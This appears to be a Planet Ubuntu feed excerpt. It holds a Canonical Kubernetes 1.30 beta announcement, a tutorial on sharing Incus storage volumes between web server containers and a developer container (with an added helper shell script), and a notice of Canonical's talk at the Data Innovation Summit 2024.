<p>Typical application development flows start with the developer workstation and go through CI/CD pipelines to end up in the production environment. These software delivery stages, spanning various environments, should be closely aligned to enhance developer experience and avoid infrastructure configuration surprises as your software progresses through the pipeline. When done right, you can deploy applications faster. You also get better security assurance as everyone can use the same K8s binary offered by the same vendor across the entire infrastructure software stack.</p>
<p>When you scale up from the workstation to a production environment, you will inevitably be exposed to a different class of problems inherent to large-scale infrastructure. For instance, managing and upgrading cluster nodes becomes complicated and time-consuming as the number of nodes and applications grows. To provide the smooth automation administrators need, we offer Kubernetes lifecycle management through <a href="https://charmhub.io/k8s">Juju</a>, Canonical’s open source orchestration engine for software operators. </p>
<p>If you have Juju installed on your machine already, a Canonical Kubernetes cluster is only a single command away:</p>
<pre class="wp-block-code"><code>juju deploy k8s --channel edge</code></pre>
<p>By letting <a href="https://charmhub.io/k8s">Juju Charm</a> automate your lifecycle management, you can benefit from its rich integration ecosystem, including the Canonical Observability Stack.</p>
<h2 class="wp-block-heading">Enhanced security posture</h2>
<p>Security is critical to any Kubernetes cluster, and we have addressed it from the beginning. Canonical Kubernetes 1.30 installs as a snap with a classic confinement level, enabling automatic patch upgrades to protect your infrastructure against known vulnerabilities. Canonical Kubernetes will be shipped as a strict snap in the future, which means it will run in complete isolation with minimal access to the underlying system’s resources. Additionally, Canonical Kubernetes will comply with security standards like FIPS, CIS and DISA-STIG.</p>
<p>Critical functionalities we have built into Canonical Kubernetes, such as <em>networking</em> or <em>dns</em>, are shipped as secure container images maintained by our team. Those images are built with Ubuntu as their base OS and benefit from the same security commitments we make on the distribution.</p>
<p>While it is necessary to contain core Kubernetes processes, we must also ensure that the user or operator-provided workloads running on top get a secure, adequately controlled environment. Future versions of Canonical Kubernetes will provide AppArmor profiles for the containers that do not inherit the enhanced features of the underlying container runtime. We will also work on creating an allowlist for kernel modules that can be loaded using the Kubernetes Daemonsets. It will contain a default list of the most popular modules, such as GPU modules needed by AI workloads. Operators will be able to edit the allowlist to suit their needs.</p>
<h2 class="wp-block-heading">Try out Canonical Kubernetes 1.30 beta</h2>
<p>We would love for you to try all the latest features in upstream Kubernetes through our beta. Get started by visiting <a href="http://documentation.ubuntu.com/canonical-kubernetes">http://documentation.ubuntu.com/canonical-kubernetes</a></p>
<p>Besides getting a taste of the features I outlined above, you’ll be able to try <a href="https://github.com/orgs/kubernetes/projects/175/views/1?filterQuery=status%3A%22Tracked+for+Code+Freeze%22&sortedBy%5Bdirection%5D=desc&sortedBy%5BcolumnId%5D=71335256">exciting changes</a> that will soon be included in the upcoming upstream GA release on 17 April 2024. Among others, <em>CEL for admission controls</em> will become stable, and the <em>drop-in directory for Kubelet configuration files</em> will go to the beta stage. Additionally, <em>Contextual logging</em> and <em>CRDValidationRatcheting</em> will graduate to beta and be enabled by default. There are also new metrics, such as <em>image_pull_duration_seconds,</em> which can tell you how much time the node spent waiting for the image.</p>
<p>We want Canonical Kubernetes to be a great K8s for everyone, from developers to large-scale cluster administrators.</p>
<p>Try it out and let us know what you think. We would love your feedback! You can find contact information on <a href="https://documentation.ubuntu.com/canonical-kubernetes/latest/reference/community">our community page</a>.</p>
<p>We’ll also be available at <a href="https://ubuntu.com/blog/meet-canonical-at-kubecon-eu">KubeCon in Paris, at booth E25</a> – if you are there, come and say hi.</p>
<p></p>Ubuntu developershttp://planet.ubuntu.com/Simos Xenitellis: How to manage the files of several Incus containers from a separate Incus containerhttps://blog.simos.info/?p=465302024-03-14T11:31:58+00:00<p><a href="https://linuxcontainers.org/incus/">Incus</a> is a manager for virtual machines and system containers. </p>
<p>A <strong>system container</strong> is an instance of an operating system that runs on a computer alongside the main operating system. Unlike a virtual machine, a system container relies on security primitives of the Linux kernel for its separation from the main operating system. You can think of system containers as <em>software virtual machines</em>.</p>
<p>In this post we are going to see <strong><em>how to conveniently manage the files of several Incus containers from a separate Incus container</em></strong>. The common use-case is that you have several Incus containers, each of which hosts a Website, and you want your Web developer to have access to the files from a central location with either FTP or SFTP. Ideally, that central location should be an Incus container as well.</p>
<p>Therefore, we are looking at <strong><em>how to share storage between containers</em></strong>. The other case, which we are not covering here, is how to share storage between the host and the containers. </p>
<h2 class="wp-block-heading" id="the-setup">The setup</h2>
<p>We are creating several Incus containers and each one of them is a separate web server. Each web server expects to find the Web content files in the <code>/var/www/</code> directory. Then, we want to create a separate container for the Web developer in order to give access to those <code>/var/www/</code> directories from some central location. The Web developer will get access to that specific container and only that container. As Incus admins we are supposed to provide access to the Web developer to that specific container through SSH or FTP. </p>
<p>In this setup, the Incus container for the web server is <code>webserver1</code> and the Web developer’s container is called <code>webdev</code>.</p>
<p>We will be creating <em><strong>storage volumes</strong></em> for each web server from the Incus storage pool, then use <code>incus storage volume attach</code> to attach those volumes to both the corresponding web server container and the Web developer’s container. </p>
<h2 class="wp-block-heading" id="setting-up-the-incus-container-for-webserver1">Setting up the Incus container for <code>webserver1</code></h2>
<p>First we create the web server container, <code>webserver1</code>, and install the web server package. By default, the <em>nginx</em> web server creates a directory <code>html</code> in <code>/var/www/</code> for our default Web server. A few steps later, we will attach there the storage volume that stores the files for this web server.</p>
<pre class="wp-block-code"><code>$ <kbd>incus launch images:debian/12/cloud webserver1</kbd>
Launching webserver1
$ <kbd>incus exec webserver1 -- su --login debian</kbd>
debian@webserver1:~$ <kbd>sudo apt update</kbd>
...
debian@webserver1:~$ <kbd>sudo apt install -y nginx</kbd>
...
debian@webserver1:~$ <kbd>cd /var/www/</kbd>
debian@webserver1:/var/www$ <kbd>ls -l</kbd>
total 1
drwxr-xr-x 2 root root 3 Mar 14 08:34 html
debian@webserver1:/var/www$ <kbd>ls -l html/</kbd>
total 1
-rw-r--r-- 1 root root 615 Mar 14 08:34 index.nginx-debian.html
debian@webserver1:/var/www$ </code></pre>
<h2 class="wp-block-heading" id="setting-up-the-incus-container-for-webdev">Setting up the Incus container for <code>webdev</code></h2>
<p>Then, we create the Incus container for the Web developer. Ideally, you should provide access to this container to your Web developer through SSH/SFTP. Use <code>incus config device add</code> to create a <em>proxy device</em> in order to give access to your Web developer. Here, we create a <code>WEBDEV</code> directory in the home directory of the default <code>debian</code> user account of this container. In there, in the next step, we will be attaching the separate storage volumes of each web server. </p>
<pre class="wp-block-code"><code>$ <kbd>incus launch images:debian/12/cloud webdev</kbd>
Launching webdev
$ <kbd>incus exec webdev -- su --login debian</kbd>
debian@webdev:~$ <kbd>pwd</kbd>
/home/debian
debian@webdev:~$ <kbd>mkdir WEBDEV</kbd>
debian@webdev:~$ <kbd>ls -l </kbd>
total 1
drwxr-xr-x 2 debian debian 2 Mar 14 09:28 WEBDEV
debian@webdev:~$ </code></pre>
<h2 class="wp-block-heading" id="setting-up-the-storage-volume-for-each-web-server">Setting up the storage volume for each web server</h2>
<p>When you launch an Incus container, you automatically get a single storage volume for the files of that container. We are treating ourselves and creating an extra storage volume for the web data. But let’s learn a bit about storage, storage pools and storage volumes. </p>
<p>We run <code>incus storage list</code> to get a list of the storage pools for our installation. In this case, the <strong><em>storage pool</em></strong> is called <code>default</code> (<em>name</em>), we are using ZFS for storage (<em>driver</em>), and the ZFS pool (<em>source</em>) is called <code>default</code> as well. For the last part, you can run <code>zpool list</code> to verify the ZFS pool details. For the <code>USED BY</code> number of 89 in this example, you can verify it from the output of <code>zfs list</code>.</p>
<pre class="wp-block-code"><code>$ <kbd>incus storage list</kbd>
+---------+--------+---------+-------------+---------+---------+
| NAME | DRIVER | SOURCE | DESCRIPTION | USED BY | STATE |
+---------+--------+---------+-------------+---------+---------+
| default | zfs | default | | 89 | CREATED |
+---------+--------+---------+-------------+---------+---------+
$ <kbd>zpool list</kbd>
NAME SIZE ALLOC FREE CKPOINT EXPANDSZ FRAG CAP DEDUP HEALTH ALTROOT
default 512G 136.9G 375.1G - - 8% 18% 1.00x ONLINE -
$ </code></pre>
<p>We run <code>incus storage volume list</code> to get a list of the storage volumes in Incus. I am not showing the output here because it’s big. The first column is the <strong><em>type</em></strong> of the storage volume, either</p>
<ol>
<li><code>container</code>, one per system container, </li>
<li><code>image</code>, for each cached image from a remote like <a href="http://images.linuxcontainers.org">images.linuxcontainers.org</a>, </li>
<li><code>virtual-machine</code>, for each virtual machine, or</li>
<li> <code>custom</code>, for those created by ourselves as we are going to do in a moment.</li>
</ol>
<p>The fourth column is the <strong><em>content-type</em></strong> of a storage volume, and this can be either <code>filesystem</code> or <code>block</code>. The default when creating storage volumes is <code>filesystem</code> and we will be creating <code>filesystem</code> in a bit. </p>
<h3 class="wp-block-heading" id="creating-the-webdata1-storage-volume">Creating the <code>webdata1</code> storage volume</h3>
<p>Now we are ready to create the <code>webdata1</code> storage volume. With <code>incus storage volume</code>, we use the <code>create</code> command to create the <code>webdata1</code> storage volume on the <code>default</code> storage pool, with content type <code>filesystem</code>.</p>
<pre class="wp-block-code"><code>$ <kbd>incus storage volume create default webdata1 --type=filesystem</kbd>
Storage volume webdata1 created
$ </code></pre>
<h3 class="wp-block-heading" id="attaching-the-webdata1storage-volume-to-the-web-server-container">Attaching the <code>webdata1</code> storage volume to the web server container</h3>
<p>Now we can attach the <code>webdata1</code> storage volume to the <code>webserver1</code> container. With <code>incus storage volume</code>, we use the <code>attach</code> command to attach the <code>webdata1</code> storage volume from the <code>default</code> storage pool to the <code>webserver1</code> container, and mount it over the <code>/var/www/html/</code> path.</p>
<pre class="wp-block-code"><code>$ <kbd>incus storage volume attach default webdata1 webserver1 /var/www/html/</kbd>
$ </code></pre>
<h3 class="wp-block-heading" id="attaching-the-webdata1storage-volume-to-the-webdev-container">Attaching the <code>webdata1</code> storage volume to the webdev container</h3>
<p>Now we can attach the <code>webdata1</code> storage volume to the <code>webdev</code> container. With <code>incus storage volume</code>, we use the <code>attach</code> command to attach the <code>webdata1</code> storage volume from the <code>default</code> storage pool to the <code>webdev</code> container, and mount it over the <code>/home/debian/WEBDEV/webserver1</code> path.</p>
<pre class="wp-block-code"><code>$ <kbd>incus storage volume attach default webdata1 webdev /home/debian/WEBDEV/webserver1</kbd>
$ </code></pre>
<h3 class="wp-block-heading" id="preparing-the-storage-volume-for-webserver1">Preparing the storage volume for <code>webserver1</code></h3>
<p>We have attached the storage volume to both the web server container and the web development container. Let’s set up the initial permissions and create a simple hello world HTML file. We get a shell into the web development container <code>webdev</code>, and observe that the storage volume has been mounted. The default permissions are <code>drwx--x--x</code> and we change them to <code>drwxr-xr-x</code>. That is, we can list the contents of the directory. Then, we change the owner:group to <code>debian:debian</code> in order to give the Web developer full access when they edit the files.</p>
<pre class="wp-block-code"><code>$ <kbd>incus exec webdev -- su --login debian</kbd>
debian@webdev:~$ <kbd>ls -l</kbd>
total 1
drwxr-xr-x 3 debian debian 3 Mar 14 10:33 WEBDEV
debian@webdev:~$ <kbd>cd WEBDEV/</kbd>
debian@webdev:~/WEBDEV$ <kbd>ls -l</kbd>
total 1
drwx--x--x 2 root root 2 Mar 14 09:59 webserver1
debian@webdev:~/WEBDEV$ <kbd>sudo chmod 755 webserver1/</kbd>
debian@webdev:~/WEBDEV$ <kbd>sudo chown debian:debian webserver1/</kbd>
debian@webdev:~/WEBDEV$ <kbd>ls -l</kbd>
total 1
drwxr-xr-x 2 debian debian 2 Mar 14 09:59 webserver1
debian@webdev:~/WEBDEV$ </code></pre>
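<p>The create, attach and permission steps above, repeated for several web servers, as an added example that is not part of the original post. It assumes one volume named <code>webdata-&lt;container&gt;</code> per web server, attaches with <code>incus config device add</code> rather than <code>incus storage volume attach</code> so that the web server side can be mounted with <code>readonly=true</code> (nginx only reads the files), and rejects container names that could add path components to the mount point in <code>webdev</code>.</p>

```shell
#!/bin/sh
# Added example (not from the original post): print the incus commands that
# repeat this post's volume sharing for several web server containers.
# Assumed names: pool "default", developer container "webdev", and one custom
# volume "webdata-<container>" per web server.

POOL="${POOL:-default}"
WEBDEV="${WEBDEV:-webdev}"
WEBDEV_ROOT="${WEBDEV_ROOT:-/home/debian/WEBDEV}"

# Accept only plain instance names, so that a name can never add path
# components (such as "../") to the mount point built inside webdev.
valid_name() {
    case "$1" in
        ''|-*|*-|[0-9]*|*[!A-Za-z0-9-]*) return 1 ;;
    esac
    [ "${#1}" -le 63 ]
}

# Print the commands for one web server, one command per line.
plan_one() {
    server="$1"
    valid_name "$server" || { echo "invalid container name: $server" >&2; return 1; }
    volume="webdata-$server"
    mnt="$WEBDEV_ROOT/$server"
    echo "incus storage volume create $POOL $volume --type=filesystem"
    # Web server side: the content is only served, so mount it read-only.
    echo "incus config device add $server $volume disk pool=$POOL source=$volume path=/var/www/html readonly=true"
    # Developer side: read-write mount under ~/WEBDEV/<container>.
    echo "incus config device add $WEBDEV $volume disk pool=$POOL source=$volume path=$mnt"
    # Same ownership and mode that the post sets by hand from inside webdev.
    echo "incus exec $WEBDEV -- chown debian:debian $mnt"
    echo "incus exec $WEBDEV -- chmod 755 $mnt"
}

# Print the commands for every web server given as an argument.
plan_all() {
    for s in "$@"; do
        plan_one "$s" || return 1
    done
}

# Run the plan. Every name is validated before the first command is executed.
apply_all() {
    plan=$(plan_all "$@") || return 1
    printf '%s\n' "$plan" | while IFS= read -r cmd; do
        echo "+ $cmd"
        $cmd || exit 1
    done
}

# Stand-alone use:   sh share-volumes.sh webserver1 webserver2    (print only)
#            APPLY=1 sh share-volumes.sh webserver1 webserver2    (execute)
if [ "$#" -gt 0 ]; then
    if [ "${APPLY:-0}" = 1 ]; then apply_all "$@"; else plan_all "$@"; fi
fi
```

<p>If the web application itself has to write into its content directory, drop <code>readonly=true</code> for that container only.</p>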
<h3 class="wp-block-heading" id="creating-an-initial-helloworld-html-file">Creating an initial HelloWorld HTML file</h3>
<p>Still in the <code>webdev</code> container, we create an initial HTML file. Note that once you paste the HTML code, you press Ctrl+d to save the <code>index.html</code> file.</p>
<pre class="wp-block-code"><code>debian@webdev:~/WEBDEV$ <kbd>cd webserver1</kbd>
debian@webdev:~/WEBDEV/webserver1$ <kbd>cat > index.html</kbd>
<kbd><!DOCTYPE HTML>
<html>
<head>
<title>Welcome to Incus</title>
<meta charset="utf-8" />
</head>
<style>
body {
background: rgb(2,0,36);
background: linear-gradient(90deg, rgba(2,0,36,1) 0%, rgba(9,9,121,1) 35%, rgba(0,212,255,1) 100%);
}
h1,p {
color: white;
text-align: center;
}
</style>
<body>
<h1>Welcome to Incus</h1>
<p>The web development data of this web server are stored in an Incus storage volume. </p>
<p>This storage volume is attached to both the web server container and a web development container. </p>
</body>
</html></kbd>
Ctrl+d
debian@webdev:~/WEBDEV/webserver1$ <kbd>ls -l</kbd>
total 1
-rw-r--r-- 1 debian debian 608 Mar 14 11:05 index.html
debian@webdev:~/WEBDEV/webserver1$ <kbd>logout</kbd>
$ </code></pre>
<h3 class="wp-block-heading" id="testing-the-result">Testing the result</h3>
<p>We visit the web server using our browser. The IP address of the web server is obtained as follows.</p>
<pre class="wp-block-code"><code>$ <kbd>incus list webserver1 -c n4</kbd>
+------------+--------------------+
| NAME | IPV4 |
+------------+--------------------+
| webserver1 | 10.10.10.88 (eth0) |
+------------+--------------------+
$ </code></pre>
<p>This is the HTML page we created. </p>
<figure class="wp-block-image size-full"><a href="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/Screenshot-2024-03-14-at-13-09-13-Welcome-to-Incus.png?ssl=1"><img alt="" class="wp-image-46543" height="247" src="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/Screenshot-2024-03-14-at-13-09-13-Welcome-to-Incus.png?resize=750%2C247&ssl=1" width="750" /></a></figure>
<h2 class="wp-block-heading" id="conclusion">Conclusion</h2>
<p>We showed how to use a storage volume to separate the web server data files from the web server container. Those files are stored in the Incus storage pool. We attached the same storage volume to a separate container for the Web developer so that they get access to the files and only the files from a central location, the <code>webdev</code> container. </p>
<p>An additional task would be to set up <code>git</code> in the <code>webdev</code> container so that any changes to the web files are tracked. </p>
<p>You can also <code>detach</code> storage volumes (not shown here).</p>
<p>You would use <code>incus config device</code> to create a proxy device to give external access to the Web developer, preferably over SSH/SFTP instead of just plain FTP. In terms of usability, there is no difference between the two. Yeah, please use SFTP. All web development tools should support SFTP.</p>
Ubuntu developershttp://planet.ubuntu.com/Ubuntu Blog: Join the Canonical Data and AI team at Data Innovation Summit 2024https://ubuntu.com//blog/join-canonical-data-and-ai-team-at-data-innovation-summit-20242024-03-14T08:00:09+00:00<figure class="wp-block-image size-full">
<div class="lazyload">
<noscript>
<img alt="" height="1440" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_2560,h_1440/https://ubuntu.com/wp-content/uploads/5daf/data-innovation-summit-1.jpg" width="2560" />
</noscript>
</div>
</figure>
<p>Canonical is delighted to be a technology partner at the <a href="https://datainnovationsummit.com/">Data Innovation Summit (DIS)</a> in 2024. We are proud to showcase our Data and AI solutions through our conference talk and technology in practice sessions. The event will take place in Kistamässan, Stockholm on April 24-25, 2024. Visit us at <strong>booth C71</strong> to learn how open source data and AI solutions can help you take your models to production, from edge to cloud.</p>
<p> <a class="p-button--small p-button--positive" href="https://calendly.com/victoria-antipova/canonical-at-data-innovation-summit?month=2024-04" rel="noreferrer noopener" target="_blank">Book a meeting with us</a></p>
<h2 class="wp-block-heading">Data and AI: get first-hand insights from Canonical experts</h2>
<p>The modern enterprise can use AI algorithms and models to learn from their treasure troves of big data, and make predictions or decisions based on the data without being explicitly programmed to do so. What’s more, the AI models grow more accurate over time. </p>
<p>The magic is in the melding of AI and big data. Data of incredible volume, velocity, and variety is fed into the AI engine, making the AI smarter. Over time, less human intervention is needed for the AI to run properly; in time, the AI can deliver deeper insights—and strategic value—from the ever-increasing pools of data, often in real time. </p>
<p>In today’s competitive business environment, your AI and data strategies need to be more interconnected than ever. According to an MIT Technology Review survey, 78% of CIOs say that scaling AI to create business value is the top priority of their enterprise data strategy, and 96% of AI leaders agree. Nearly three out of four CIOs also say that data challenges are the biggest factor jeopardising AI success.</p>
<p>The Data Innovation Summit is a significant event in the field of Data and AI, especially in the Nordics. It brings together professionals, enterprise practitioners, technology providers, start-up innovators, and academics working with data and AI. We at Canonical are delighted to announce that we will be participating in this event and sharing our expertise in Data and AI.</p>
<p>Canonical is a well-known publisher of Ubuntu, which is the preferred operating system (OS) for data scientists. In addition to the OS, Canonical offers an integrated data and AI stack. We provide the most cost-effective options to help you gain control over your Total Cost of Ownership (TCO), and ensure reliable security maintenance, allowing you to innovate at a faster pace.</p>
<h2 class="wp-block-heading">Canonical DIS talk: open source DataOps and MLOps</h2>
<figure class="wp-block-image">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh7-us.googleusercontent.com/rNlCdVhNBJWwc97bY6gr0qc04QJcdZtFGYsEK6VmC3O63E4Qx_VIP2L0C_YMaeXQLqbAR6VG8TnSZORC1tz24iMcIiWH2ZzB-hpRSdlAAM22zosba-cmn0OHcXzJqObztGMGMQPQ6VdPKwfezB6zjD0" width="720" />
</noscript>
</div>
</figure>
<p>Canonical data and AI Product Managers <a href="https://ubuntu.com/blog/author/munteanuandreea">Andreea Munteanu</a> and <a href="https://ubuntu.com/blog/author/mtabirao">Michelle Anne Tabirao</a> will be speaking about open source for your DataOps and MLOps.</p>
<p><em><strong>Talk description</strong></em></p>
<p>Open source data and AI tools enable organisations to create a comprehensive solution that covers all stages of the data and machine learning lifecycle. This includes correlating data from various sources, regardless of their collection engine, and serving the model in production. Together, DataOps and MLOps drive the collaboration, communication, and integration that great data and AI teams need, making them essential to the model lifecycle. DataOps is an approach to data management that focuses on collaboration, communication, and integration among data engineers, data scientists, and other data-related roles to improve the efficiency and effectiveness of data processes. MLOps is a set of practices that combines machine learning, software development, and operations to enable the deployment, monitoring, and maintenance of machine learning models in production environments.</p>
<p>In this talk, we will explore how to build an end-to-end solution for DataOps and MLOps using open-source solutions like databases, ML and analytics tools such as OpenSearch, Kubeflow, and MLFlow. Professionals can focus on building ML models without spending time on the tooling operational work. We will highlight some use cases, e.g. in the telco sector, where they use MLOps and DataOps to optimise the telco network infrastructure and reduce power consumption.</p>
<p>Attendees will learn about the critical factors to consider when selecting tools and best practices needed for building a robust, production-grade ML project.</p>
<h2 class="wp-block-heading">Come and meet us at DIS 2024</h2>
<p>If you are interested in building or scaling your data and AI projects with open source solutions, we are here to help you. Visit our <a href="https://canonical.com/data">Data</a> and <a href="https://ubuntu.com/ai">AI offerings</a> to explore our solutions.</p>
<h2 class="wp-block-heading has-black-color has-text-color has-link-color wp-elements-c2a2bcc8152d07708b268ae24c209719">Learn more about our Data and AI solutions</h2>
<ul>
<li><a href="https://open.spotify.com/show/0vXcVgTHKUeJZx5YYYgdiX">Ubuntu AI podcast</a>: dive into data and AI on the go</li>
<li><a href="https://ubuntu.com/engage/open-source-big-data-ai">Big data and AI WP</a>: build a smarter enterprise with a secure, integrated open source stack</li>
<li><a href="https://ubuntu.com/engage/mongodb-enterprise-data-management">MongoDB for enterprise data management WP</a>: MongoDB benefits for modern enterprise data management, use cases for financial, telecommunications and automotive industries</li>
<li><a href="https://pages.ubuntu.com/rs/066-EOV-335/images/Canonical_MLOps_Toolkit.pdf?version=0">MLOps toolkit</a>: from hardware to applications, discover the key factors to consider when building your machine learning toolkit</li>
<li><a href="https://ubuntu.com/engage/postgres-ai-applications">Using PostgreSQL to power your AI applications</a>: learn what PostgreSQL has to offer for your AI projects</li>
<li><a href="https://canonical.com/data">Canonical Data</a>: enterprise data solutions for rapid innovation at any scale</li>
<li><a href="https://ubuntu.com/ai">Canonical AI</a>: take your models to production with open source AI</li>
</ul>Ubuntu developershttp://planet.ubuntu.com/